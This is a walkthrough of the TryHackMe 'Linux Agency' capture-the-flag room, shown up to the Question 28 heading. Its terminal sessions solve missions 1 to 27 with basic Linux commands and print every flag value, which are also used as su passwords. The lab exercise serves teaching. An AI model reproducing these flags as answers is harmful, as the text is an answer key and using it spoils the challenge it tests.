In this walk through, we will be going through the Linux Agency room from Tryhackme. This Room will help you to sharpen your Linux Skills and help you to learn basic privilege escalation in a HITMAN theme. So, pack your briefcase and grab your SilverBallers as its gonna be a tough ride. On that note, let’s get started.
Machine Info:
| Title | Linuxagency 1.5 |
| IPaddress | 10.10.86.7 |
| Difficulty | Medium |
| Objective | This Room will help you to sharpen your Linux Skills and help you to learn basic privilege escalation in a HITMAN theme. So, pack your briefcase and grab your SilverBallers as its gonna be a tough ride. |
Task 1 – Deploy The Machine
Task 2 – Let’s just jump in
Task 3 – Linux Fundamentals
Question 1 – What is the mission1 flag?
- The first flag is already presented on the banner screen of your SSH login.
wh1terose@fsociety:~$ ssh [email protected] The authenticity of host '10.10.86.7 (10.10.86.7)' can't be established. ECDSA key fingerprint is SHA256:NPQ78ILJE6Ra+F9r/z2ZUWdpPGeAHnuNAc5kOaFbTjU. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.86.7' (ECDSA) to the list of known hosts. [email protected]'s password: Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 0 packages can be updated. 0 updates are security updates. mission1{174dc8f191bcbb161fe25f8a5b58d1f0} agent47@linuxagency:~$
mission1{174dc8f191bcbb161fe25f8a5b58d1f0}Question 2 – What is the mission2 flag?
- To move ahead, use the mission 1 flag string as a password for the user – mission 1. It reveals the mission 2 flag. Use the same to login as mission 2.
agent47@linuxagency:/home$ su mission1
Password:
mission1@linuxagency:/home$ ls
0z09e diana maya mission11 mission14 mission17 mission2 mission22 mission25 mission28 mission30 mission6 mission9 sean xyan1d3
agent47 jordan mission1 mission12 mission15 mission18 mission20 mission23 mission26 mission29 mission4 mission7 penelope silvio
dalia ken mission10 mission13 mission16 mission19 mission21 mission24 mission27 mission3 mission5 mission8 reza viktor
mission1@linuxagency:/home$ cd mission1
mission1@linuxagency:~$ ls
mission2{8a1b68bb11e4a35245061656b5b9fa0d}
mission1@linuxagency:~$
mission1@linuxagency:~$ su mission2
Password:
mission2@linuxagency:/home/mission1$
mission2@linuxagency:/home/mission1$ 
mission2{8a1b68bb11e4a35245061656b5b9fa0d}Question 3 – What is the mission3 flag?
- Now, read the contents of the flag.txt using “cat” to reveal the mission 3 password.
mission2@linuxagency:/home$ cd mission2
mission2@linuxagency:~$ ls -l
total 4
-r-------- 1 mission2 mission2 43 Jan 12 2021 flag.txt
mission2@linuxagency:~$ cat flag.txt
mission3{ab1e1ae5cba688340825103f70b0f976}
mission2@linuxagency:~$ 
mission3{ab1e1ae5cba688340825103f70b0f976}Question 4 – What is the mission4 flag?
- With the help of the mission 3 credentials found earlier, I changed my user to mission3. With the help of this, read the contents of the flag.txt which reveals that flag has been stolen. But, if we try to open the file with a text editor like “nano”, it gives us our flag.
mission2@linuxagency:~$ su mission3 Password: mission3@linuxagency:/home/mission2$ cd .. mission3@linuxagency:/home$ cd mission3 mission3@linuxagency:~$ cat flag.txt I am really sorry man the flag is stolen by some thief's. mission3@linuxagency:~$
mission4{264a7eeb920f80b3ee9665fafb7ff92d}Question 5 – What is the mission5 flag?
- Further for mission 5, read out the contents of the flag.txt in the flag directory in its home folder.
mission3@linuxagency:/home$ su mission4
Password:
mission4@linuxagency:/home$ cd mission4
mission4@linuxagency:~$ ls -la
total 20
drwxr-x--- 3 mission4 mission4 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission4 mission4 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission4 mission4 3771 Jan 12 2021 .bashrc
drwxr-xr-x 2 mission4 mission4 4096 Jan 12 2021 flag
-rw-r--r-- 1 mission4 mission4 807 Jan 12 2021 .profile
mission4@linuxagency:~$ cd flag/
mission4@linuxagency:~/flag$ ls -la
total 12
drwxr-xr-x 2 mission4 mission4 4096 Jan 12 2021 .
drwxr-x--- 3 mission4 mission4 4096 Jan 12 2021 ..
-r-------- 1 mission4 mission4 43 Jan 12 2021 flag.txt
mission4@linuxagency:~/flag$ cat flag.txt
mission5{bc67906710c3a376bcc7bd25978f62c0}
mission4@linuxagency:~/flag$ 
mission5{bc67906710c3a376bcc7bd25978f62c0}Question 6 – What is the mission6 flag?
- For mission6 flag, read the hidden file – .flag.txt.
mission4@linuxagency:/home$ su mission5
Password:
mission5@linuxagency:/home$ cd mission5
mission5@linuxagency:~$ ls -l
total 0
mission5@linuxagency:~$ pwd
/home/mission5
mission5@linuxagency:~$ ls -la
total 20
drwxr-x--- 2 mission5 mission5 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission5 mission5 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission5 mission5 3771 Jan 12 2021 .bashrc
-r-------- 1 mission5 mission5 43 Jan 12 2021 .flag.txt
-rw-r--r-- 1 mission5 mission5 807 Jan 12 2021 .profile
mission5@linuxagency:~$ cat .flag.txt
mission6{1fa67e1adc244b5c6ea711f0c9675fde}
mission5@linuxagency:~$ 
mission6{1fa67e1adc244b5c6ea711f0c9675fde}Question 7 – What is the mission7 flag?
- The flag for mission7 was stored inside flag.txt file inside a hidden .flag directory.
mission5@linuxagency:/home$ su mission6
Password:
mission6@linuxagency:/home$ cd mission6
mission6@linuxagency:~$ ls -la
total 20
drwxr-x--- 3 mission6 mission6 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission6 mission6 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission6 mission6 3771 Jan 12 2021 .bashrc
drwxr-xr-x 2 mission6 mission6 4096 Jan 12 2021 .flag
-rw-r--r-- 1 mission6 mission6 807 Jan 12 2021 .profile
mission6@linuxagency:~$ cd .flag/
mission6@linuxagency:~/.flag$ ls -l
total 4
-r-------- 1 mission6 mission6 43 Jan 12 2021 flag.txt
mission6@linuxagency:~/.flag$ cat flag.txt a
mission7{53fd6b2bad6e85519c7403267225def5}
cat: a: No such file or directory
mission6@linuxagency:~/.flag$ cat flag.txt
mission7{53fd6b2bad6e85519c7403267225def5}
mission6@linuxagency:~/.flag$ 
mission7{53fd6b2bad6e85519c7403267225def5}Question 8 – What is the mission8 flag?
mission6@linuxagency:/home$ su mission7
Password:
bash: /home/mission6/.bashrc: Permission denied
mission7@linuxagency:/home$ cd mission7
mission7@linuxagency:/home/mission7$ ls -la
total 20
drwxr-x--- 2 mission7 mission7 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission7 mission7 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission7 mission7 3771 Jan 12 2021 .bashrc
-r-------- 1 mission7 mission7 43 Jan 12 2021 flag.txt
-rw-r--r-- 1 mission7 mission7 807 Jan 12 2021 .profile
mission7@linuxagency:/home/mission7$ cat flag.txt
mission8{3bee25ebda7fe7dc0a9d2f481d10577b}
mission7@linuxagency:/home/mission7$ 
mission8{3bee25ebda7fe7dc0a9d2f481d10577b}Question 9 – What is the mission9 flag?
- This task has nothing in his home directory. To reveal the same go to the base directory, there we found the flag for mission 9.
mission7@linuxagency:/home$ su mission8
Password:
mission8@linuxagency:/home$ cd mission8
mission8@linuxagency:~$ ls -l
total 0
mission8@linuxagency:~$ cd ../..
mission8@linuxagency:/$ ls
bin cdrom etc home initrd.img.old lib64 media opt root sbin srv sys usr vmlinuz
boot dev flag.txt initrd.img lib lost+found mnt proc run snap swapfile tmp var
mission8@linuxagency:/$ cat flag.txt
mission9{ba1069363d182e1c114bef7521c898f5}
mission8@linuxagency:/$ 
mission9{ba1069363d182e1c114bef7521c898f5}Question 10 – What is the mission10 flag?
- Moving on to mission 10, here we have rockyou.txt to. We will use the grep command to filter out the flag occurrence and thus flag was revealed.
mission8@linuxagency:/home$ su mission9
Password:
mission9@linuxagency:/home$ cd mission9
mission9@linuxagency:~$ ls -la
total 136664
drwxr-x--- 2 mission9 mission9 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission9 mission9 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission9 mission9 3771 Jan 12 2021 .bashrc
-rw-r--r-- 1 mission9 mission9 807 Jan 12 2021 .profile
-r-------- 1 mission9 mission9 139921551 Jan 12 2021 rockyou.txt
mission9@linuxagency:~$ cat rockyou.txt | grep "mission10"
mission101
mission10
mission10{0c9d1c7c5683a1a29b05bb67856524b6}
mission1098
mission108
mission9@linuxagency:~$ 
mission10{0c9d1c7c5683a1a29b05bb67856524b6}Question 11 – What is the mission11 flag?
- As we can see, there is a directory called “folder” inside the mission 10 home folder. The directories contains a tree of sub-directories inside it. We will use the grep command with the recursive option to get the mission 11 flag.
mission9@linuxagency:/home$ su mission10
Password:
mission10@linuxagency:/home$ cd mission10
mission10@linuxagency:~$ ls -l
total 4
drwxr-xr-x 12 mission10 mission10 4096 Jan 12 2021 folder
mission10@linuxagency:~$ cd folder/
mission10@linuxagency:~/folder$ ls
L4D1 L4D10 L4D2 L4D3 L4D4 L4D5 L4D6 L4D7 L4D8 L4D9
mission10@linuxagency:~/folder$ grep -r "mission11"
L4D8/L3D7/L2D2/L1D10/flag.txt:mission11{db074d9b68f06246944b991d433180c0}
mission10@linuxagency:~/folder$ 
mission11{db074d9b68f06246944b991d433180c0}Question 12 – What is the mission12 flag?
- As per the question hint, we have to look into the environment variable. Doing so with the help of the “env” command, reveals the mission 12 flag.
mission10@linuxagency:/home$ su mission11
Password:
mission11@linuxagency:/home$ cd mission11
mission11@linuxagency:~$ ls -la
total 20
drwxr-x--- 3 mission11 mission11 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission11 mission11 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission11 mission11 3963 Jan 12 2021 .bashrc
drwxr-xr-x 3 mission11 mission11 4096 Jan 12 2021 .local
-rw-r--r-- 1 mission11 mission11 807 Jan 12 2021 .profile
mission11@linuxagency:~$ env
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SSH_CONNECTION=10.18.11.103 58186 10.10.86.7 22
LESSCLOSE=/usr/bin/lesspipe %s %s
LANG=en_US.UTF-8
OLDPWD=/home
XDG_SESSION_ID=17
USER=mission11
PWD=/home/mission11
HOME=/home/mission11
SSH_CLIENT=10.18.11.103 58186 22
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
SSH_TTY=/dev/pts/0
MAIL=/var/mail/mission11
FLAG=mission12{f449a1d33d6edc327354635967f9a720}
SHELL=/bin/bash
TERM=xterm-256color
flag=mission12{f449a1d33d6edc327354635967f9a720}
SHLVL=12
LOGNAME=mission11
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus
XDG_RUNTIME_DIR=/run/user/1000
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
LESSOPEN=| /usr/bin/lesspipe %s
_=/usr/bin/env
mission11@linuxagency:~$
mission12{f449a1d33d6edc327354635967f9a720}Question 13 – What is the mission13 flag?
- While checking the contents of flag,txt file encountered an error of permission denied. On checking the permissions, found out that no permissions were set on the file. Setting it for the read permission and checking inside it gives us our flag.
mission11@linuxagency:/home$ su mission12
Password:
mission12@linuxagency:/home$ cd mission12
mission12@linuxagency:~$ ls
flag.txt
mission12@linuxagency:~$ cat flag.txt
cat: flag.txt: Permission denied
mission12@linuxagency:~$ ls -l
total 4
---------- 1 mission12 mission12 44 Jan 12 2021 flag.txt
mission12@linuxagency:~$ chmod +r flag.txt
mission12@linuxagency:~$ ls -l
total 4
-r--r--r-- 1 mission12 mission12 44 Jan 12 2021 flag.txt
mission12@linuxagency:~$ cat flag.txt
mission13{076124e360406b4c98ecefddd13ddb1f}
mission12@linuxagency:~$ 
mission13{076124e360406b4c98ecefddd13ddb1f}Question 14 – What is the mission14 flag?
- For this question, we have to decode a base 64 string to normal text to reveal the flag for mission 14.
mission12@linuxagency:/home$ su mission13
Password:
mission13@linuxagency:/home$ cd mission13
mission13@linuxagency:~$ ls -la
total 28
drwxr-x--- 3 mission13 mission13 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission13 mission13 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission13 mission13 3771 Jan 12 2021 .bashrc
-r-------- 1 mission13 mission13 61 Jan 12 2021 flag.txt
drwxr-xr-x 3 mission13 mission13 4096 Jan 12 2021 .local
-rw-r--r-- 1 mission13 mission13 807 Jan 12 2021 .profile
-rw------- 1 mission13 mission13 978 Jan 12 2021 .viminfo
mission13@linuxagency:~$ cat flag.txt
bWlzc2lvbjE0e2Q1OThkZTk1NjM5NTE0Yjk5NDE1MDc2MTdiOWU1NGQyfQo=
mission13@linuxagency:~$ echo -n "bWlzc2lvbjE0e2Q1OThkZTk1NjM5NTE0Yjk5NDE1MDc2MTdiOWU1NGQyfQo=" | base64 --decode
mission14{d598de95639514b9941507617b9e54d2}
mission13@linuxagency:~$ 
mission14{d598de95639514b9941507617b9e54d2}Question 15 – What is the mission15 flag?
- Next, for this one we have decoded the binary data found in the flag file and decoded with Cyberchef.
mission13@linuxagency:/home$ su mission14 Password: mission14@linuxagency:/home$ cd mission14 mission14@linuxagency:~$ ls -la total 20 drwxr-x--- 2 mission14 mission14 4096 Jan 12 2021 . drwxr-xr-x 45 root root 4096 Jan 12 2021 .. lrwxrwxrwx 1 mission14 mission14 9 Jan 12 2021 .bash_history -> /dev/null -rw-r--r-- 1 mission14 mission14 3771 Jan 12 2021 .bashrc -r-------- 1 mission14 mission14 345 Jan 12 2021 flag.txt -rw-r--r-- 1 mission14 mission14 807 Jan 12 2021 .profile mission14@linuxagency:~$ cat flag.txt 01101101011010010111001101110011011010010110111101101110001100010011010101111011011001100110001100110100001110010011000100110101011001000011100000110001001110000110001001100110011000010110010101100110011001100011000000110001001100010011100000110101011000110011001100110101001101000011011101100110001100100011010100110101001110010011011001111101 mission14@linuxagency:~$
mission15{fc4915d818bfaeff01185c3547f25596}Question 16 – What is the mission16 flag?
- We looked into the mission15 folder and found a flag.txt file. Reading it, found out an encoded staring. Further, decoded the string from hex to ascii using Cyberchef.
mission14@linuxagency:/home/agent47$ su mission15 Password: mission15@linuxagency:/home/agent47$ cd .. mission15@linuxagency:/home$ cd mission15 mission15@linuxagency:~$ ls flag.txt mission15@linuxagency:~$ cat flag.txt 6D697373696F6E31367B38383434313764343030333363346332303931623434643763323661393038657D mission15@linuxagency:~$
mission16{884417d40033c4c2091b44d7c26a908e}Question 17 – What is the mission17 flag?
- For this question, we logged into mission 16 and found out a file in its home folder. Apparently, the file is a binary file however no execute permissions has been setup on the file. Set it up with the +x flag and executed it to reveal the flag.
mission15@linuxagency:~$ su mission16
Password:
mission16@linuxagency:/home/mission15$ cd ..
mission16@linuxagency:/home$ cd mission16
mission16@linuxagency:~$ ls -l
total 12
-r-------- 1 mission16 mission16 8440 Jan 12 2021 flag
mission16@linuxagency:~$ chmod +x flag
mission16@linuxagency:~$ ls -l
total 12
-r-x--x--x 1 mission16 mission16 8440 Jan 12 2021 flag
mission16@linuxagency:~$ ./flag
mission17{49f8d1348a1053e221dfe7ff99f5cbf4}
mission16@linuxagency:~$
mission17{49f8d1348a1053e221dfe7ff99f5cbf4}Question 18 – What is the mission18 flag?
- This question deals with java. First compile the file.java file with javac and then execute it to reveal the flag.
mission16@linuxagency:~$ su mission17
Password:
mission17@linuxagency:/home/mission16$ cd ..
mission17@linuxagency:/home$ cd mission17
mission17@linuxagency:~$ ls -la
total 20
drwxr-x--- 2 mission17 mission17 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission17 mission17 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission17 mission17 3771 Jan 12 2021 .bashrc
-rwxr-xr-x 1 mission17 mission17 475 Jan 12 2021 flag.java
-rw-r--r-- 1 mission17 mission17 807 Jan 12 2021 .profile
mission17@linuxagency:~$ javac flag.java
mission17@linuxagency:~$ ls -l
total 8
-rw-rw-r-- 1 mission17 mission17 1199 Jun 20 07:58 flag.class
-rwxr-xr-x 1 mission17 mission17 475 Jan 12 2021 flag.java
mission17@linuxagency:~$ java flag
mission18{f09760649986b489cda320ab5f7917e8}
mission17@linuxagency:~$ 
mission18{f09760649986b489cda320ab5f7917e8}Question 19 – What is the mission19 flag?
- Now we have to deal with some ruby scripts. As we can see the script does not have executable permission. First we will set it up and then execute it with the ruby command to get the flag.
mission17@linuxagency:~$ su mission18
Password:
mission18@linuxagency:/home/mission17$ cd ..
mission18@linuxagency:/home$ cd mission18
mission18@linuxagency:~$ ls -la
total 20
drwxr-x--- 2 mission18 mission18 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission18 mission18 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission18 mission18 3771 Jan 12 2021 .bashrc
-r-------- 1 mission18 mission18 312 Jan 12 2021 flag.rb
-rw-r--r-- 1 mission18 mission18 807 Jan 12 2021 .profile
mission18@linuxagency:~$ chmod +x flag.rb
mission18@linuxagency:~$ ruby flag.rb
mission19{a0bf41f56b3ac622d808f7a4385254b7}
mission18@linuxagency:~$ 
mission19{a0bf41f56b3ac622d808f7a4385254b7}Question 20 – What is the mission20 flag?
- Now we have come to C files. First we will compile it using gcc and then execute the compiled binary to get the flag.
mission18@linuxagency:~$ su mission19
Password:
mission19@linuxagency:/home/mission18$ cd ..
mission19@linuxagency:/home$ cd mission19
mission19@linuxagency:~$ ls -la
total 20
drwxr-x--- 2 mission19 mission19 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission19 mission19 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission19 mission19 3771 Jan 12 2021 .bashrc
-r-------- 1 mission19 mission19 276 Jan 12 2021 flag.c
-rw-r--r-- 1 mission19 mission19 807 Jan 12 2021 .profile
mission19@linuxagency:~$ chmod +x flag.c
mission19@linuxagency:~$ gcc flag.c -o flag
flag.c: In function ‘main’:
flag.c:5:18: warning: implicit declaration of function ‘strlen’ [-Wimplicit-function-declaration]
int length = strlen(flag);
^~~~~~
flag.c:5:18: warning: incompatible implicit declaration of built-in function ‘strlen’
flag.c:5:18: note: include ‘<string.h>’ or provide a declaration of ‘strlen’
mission19@linuxagency:~$ ls -l
total 16
-rwxrwxr-x 1 mission19 mission19 8432 Jun 20 08:06 flag
-r-x--x--x 1 mission19 mission19 276 Jan 12 2021 flag.c
mission19@linuxagency:~$ ./flag
mission20{b0482f9e90c8ad2421bf4353cd8eae1c}
mission19@linuxagency:~$
mission20{b0482f9e90c8ad2421bf4353cd8eae1c}Question 21 – What is the mission21 flag?
- Now its time for our good old snake friend – Python. Execute the file with the python keyword to get the flag.
mission19@linuxagency:~$ su mission20
Password:
mission20@linuxagency:/home/mission19$ cd ..
mission20@linuxagency:/home$ cd mission20
mission20@linuxagency:~$ ls -la
total 20
drwxr-x--- 2 mission20 mission20 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission20 mission20 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission20 mission20 3771 Jan 12 2021 .bashrc
-r-------- 1 mission20 mission20 186 Jan 12 2021 flag.py
-rw-r--r-- 1 mission20 mission20 807 Jan 12 2021 .profile
mission20@linuxagency:~$ chmod +x flag.py
mission20@linuxagency:~$ python flag.py
mission21{7de756aabc528b446f6eb38419318f0c}
mission20@linuxagency:~$ 
mission21{7de756aabc528b446f6eb38419318f0c}Question 22 – What is the mission22 flag?
- For this particular task, there is no file for the flag rather we have to upgrade and stabilize the existing tty shell. I used python to do so. Once executed the command for the tty, got the flag on the screen.
mission20@linuxagency:~$ su mission21
Password:
$ pwd
/home/mission20
$ cd mission21
sh: 2: cd: can't cd to mission21
$ cd ..
$ cd mission21
$ ls -la
total 20
drwxr-x--- 3 mission21 mission21 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission21 mission21 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission21 mission21 3853 Jan 12 2021 .bashrc
drwxr-xr-x 3 mission21 mission21 4096 Jan 12 2021 .local
-rw-r--r-- 1 mission21 mission21 807 Jan 12 2021 .profile
$ python -c 'import pty;pty.spawn("/bin/bash")'
mission22{24caa74eb0889ed6a2e6984b42d49aaf}
mission21@linuxagency:~$ 
mission22{24caa74eb0889ed6a2e6984b42d49aaf}Question 23 – What is the mission23 flag?
- In this task, we got trapped inside the python interactive shell session once we login into the mission22 task. To break out of the environment, use the python tty to get the job done.
mission21@linuxagency:~$ su mission22
Password:
Python 3.6.9 (default, Oct 8 2020, 12:12:24)
[GCC 8.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pty; pty.spawn("/bin/bash")
mission22@linuxagency:/home/mission21$ cd ..
mission22@linuxagency:/home$ cd mission22
mission22@linuxagency:~$ ls -la
total 24
drwxr-x--- 2 mission22 mission22 4096 Jun 20 08:20 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission22 mission22 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission22 mission22 3771 Jan 12 2021 .bashrc
-r-------- 1 mission22 mission22 44 Jan 12 2021 flag.txt
-rw-r--r-- 1 mission22 mission22 807 Jan 12 2021 .profile
-rw------- 1 mission22 mission22 409 Jun 20 08:20 .python_history
mission22@linuxagency:~$ cat flag.txt
mission23{3710b9cb185282e3f61d2fd8b1b4ffea}
mission22@linuxagency:~$ 
mission23{3710b9cb185282e3f61d2fd8b1b4ffea}Question 24 – What is the mission24 flag?
- For this task, we got a hint in the home folder of mission23. Post checking the hint, we looked into the /etc/hosts file, in there found an entry of a domain called machine24.com. Curl the domain and found the flag.
mission22@linuxagency:~$ su mission23
Password:
mission23@linuxagency:/home/mission22$ cd ..
mission23@linuxagency:/home$ cd mission23
mission23@linuxagency:~$ ls -la
total 24
drwxr-x--- 3 mission23 mission23 4096 Jan 15 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission23 mission23 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission23 mission23 3771 Jan 12 2021 .bashrc
drwxrwxr-x 3 mission23 mission23 4096 Jan 12 2021 .local
-r-------- 1 mission23 mission23 69 Jan 15 2021 message.txt
-rw-r--r-- 1 mission23 mission23 807 Jan 12 2021 .profile
mission23@linuxagency:~$ cat message.txt
The hosts will help you.
[OPTIONAL] Maybe you will need curly hairs.
mission23@linuxagency:~$ cat /etc/hosts
127.0.0.1 localhost linuxagency mission24.com
127.0.1.1 ubuntu linuxagency
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback linuxagency
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
mission23@linuxagency:~$ curl mission24.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
Modified from the Debian original for Ubuntu
Last updated: 2016-11-16
See: https://launchpad.net/bugs/1288690
-->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>mission24{dbaeb06591a7fd6230407df3a947b89c}</title>
<style type="text/css" media="screen">
* {
margin: 0px 0px 0px 0px;
padding: 0px 0px 0px 0px;
}
body, html {
padding: 3px 3px 3px 3px;
--- snipped ----
mission24{dbaeb06591a7fd6230407df3a947b89c}Question 25 – What is the mission25 flag?
- In this one, we found a binary file named bribe. According to the message in the file, we have to bribe someone in order to reveal the flag. I set the environment variable pocket=money in order to get the flag.
mission23@linuxagency:~$ su mission24
Password:
mission24@linuxagency:/home/mission23$ cd ..
mission24@linuxagency:/home$ cd mission24
mission24@linuxagency:~$ ls -la
total 40
drwxr-x--- 3 mission24 mission24 4096 Feb 1 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission24 mission24 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission24 mission24 3771 Jan 12 2021 .bashrc
-rwxr-xr-x 1 mission24 mission24 8576 Jan 12 2021 bribe
drwxr-xr-x 3 mission24 mission24 4096 Jan 12 2021 .local
-rw-r--r-- 1 mission24 mission24 807 Jan 12 2021 .profile
-rw------- 1 mission24 mission24 4934 Jan 12 2021 .viminfo
mission24@linuxagency:~$ ./bribe
There is a guy who is smuggling flags
Bribe this guy to get the flag
Put some money in his pocket to get the flag
Words are not the price for your flag
Give Me money Man!!!
mission24@linuxagency:~$ export pocket=money
mission24@linuxagency:~$ ./bribe
Here ya go!!!
mission25{61b93637881c87c71f220033b22a921b}
Don't tell police about the deal man ;)
mission24@linuxagency:~$
mission25{61b93637881c87c71f220033b22a921b}Question 26 – What is the mission26 flag?
- Next for mission 25, we are unable to execute most of the common commands. I set the environment path variable of /bin, which help us to execute the commands and getting the flag.
mission24@linuxagency:~$ su mission25
Password:
mission25@linuxagency:/home/mission24$ cd ..
mission25@linuxagency:/home$ cd mission25
mission25@linuxagency:~$ ls -la
bash: ls: No such file or directory
---snipped ----
mission25@linuxagency:~$ export PATH=/bin
mission25@linuxagency:~$ cat flag.txt
mission26{cb6ce977c16c57f509e9f8462a120f00}
mission25@linuxagency:~$
mission26{cb6ce977c16c57f509e9f8462a120f00}Question 27 – What is the mission27 flag?
- For this task, we have received a jpg image file. Analyzing its headers with the strings command reveals the flag.
mission25@linuxagency:~$ su mission26
Password:
mission26@linuxagency:/home/mission25$ cd .,
bash: cd: .,: Permission denied
mission26@linuxagency:/home/mission25$ cd ..
mission26@linuxagency:/home$ cd mission26
mission26@linuxagency:~$ ls -la
total 100
drwxr-x--- 2 mission26 mission26 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission26 mission26 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission26 mission26 3771 Jan 12 2021 .bashrc
-r-------- 1 mission26 mission26 85980 Jan 12 2021 flag.jpg
-rw-r--r-- 1 mission26 mission26 807 Jan 12 2021 .profile
mission26@linuxagency:~$ strings flag.jpg
JFIF
-mission27{444d29b932124a48e7dddc0595788f4d}
, #&')*)
-0-(0%()(
((((((((((((((((((((((((((((((((((((((((((((((((((
RYBP
^C^rP
!aVP
`X*P
--- snipped ---
mission27{444d29b932124a48e7dddc0595788f4d}Question 28 – What is the mission28 flag?
